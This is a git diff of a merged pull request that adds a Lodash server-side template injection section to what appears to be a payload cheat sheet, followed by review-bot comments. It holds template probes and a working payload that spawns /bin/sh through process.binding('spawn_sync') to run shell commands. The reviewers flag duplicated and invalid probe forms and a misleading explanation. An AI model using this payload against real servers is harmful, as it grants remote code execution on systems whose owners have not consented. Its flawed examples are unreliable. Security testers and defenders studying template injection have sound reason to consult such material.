Merge pull request #670 from superboy-zjc/master

Update Lodash SSTI
Swissky 2023-09-03 17:30:52 +02:00 committed by GitHub
commit c030379871

@ -56,6 +56,9 @@
- [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi)
- [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution)
- [Plugins](#plugins)
- [JavaScript - Lodash](#Lodash)
- [Lodash - Basic Injection](#Lodash---Basic-Injection)
- [Lodash - Command Execution](#Lodash---Command-Execution)
- [Python - Mako](#mako)
- [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace)
- [Java - Pebble](#pebble)
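Review bot: the three new table-of-contents entries use mixed-case fragments (`#Lodash`, `#Lodash---Basic-Injection`, `#Lodash---Command-Execution`) while every neighbouring entry uses the lowercase slug the renderer generates from the heading (`#lessjs---ssrf--lfi`, `#mako`), so these links may not resolve to the new `## Lodash` / `### Lodash - ...` headings; use `#lodash`, `#lodash---basic-injection` and `#lodash---command-execution` to match the existing convention.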
@ -743,6 +746,51 @@ registerPlugin({
---
## Lodash
[Official website](https://lodash.com/docs/4.17.15)
### Lodash - Basic Injection
How to create a template:
```javascript
const _ = require('lodash');
string = "{{= username}}"
const options = {
evaluate: /\{\{(.+?)\}\}/g,
interpolate: /\{\{=(.+?)\}\}/g,
escape: /\{\{-(.+?)\}\}/g,
};
_.template(string, options);
```
- **string:** The template string.
- **options.interpolate:** It is a regular expression that specifies the HTML *interpolate* delimiter.
- **options.evaluate:** It is a regular expression that specifies the HTML *evaluate* delimiter.
- **options.escape:** It is a regular expression that specifies the HTML *escape* delimiter.
For the purpose of RCE, the delimiter of templates is determined by the **options.evaluate** parameter.
```javascript
{{= _.VERSION}}
${= _.VERSION}
<%= _.VERSION %>
{{= _.templateSettings.evaluate }}
${= _.VERSION}
<%= _.VERSION %>
```
### Lodash - Command Execution
```
{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}}
```
## Mako
[Official website](https://www.makotemplates.org/)
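Review bot: the sentence "the delimiter of templates is determined by the **options.evaluate** parameter" is contradicted by the example block that follows it, which only shows interpolate-style payloads (`{{= _.VERSION}}`, `<%= _.VERSION %>`) and never an evaluate-style one (`{{ ... }}` with the custom options, `<% ... %>` with the defaults); the Command Execution section then relies on evaluate, so one line of each form with a note on which option it exercises would make the distinction clear. In that same block, `${= _.VERSION}` and `<%= _.VERSION %>` are listed twice, and `${= ...}` is not a valid form: the ES-style delimiter is `${expr}` with no `=`, and Lodash only enables it when the default `interpolate` delimiter is in use, which is not the case once `options.interpolate` is overridden as in the first snippet. Smaller points: the descriptions call `interpolate` and `evaluate` "HTML" delimiters, but only `escape` is HTML-related (it HTML-escapes its output) in the Lodash docs; `string = "{{= username}}"` creates an implicit global and `_.template(string, options)` returns a compiled function that is never invoked, so `const compiled = _.template(string, options); compiled({ username: 'guest' })` would show the actual rendering step; and the Command Execution code fence has no language tag where the other fences use `javascript`.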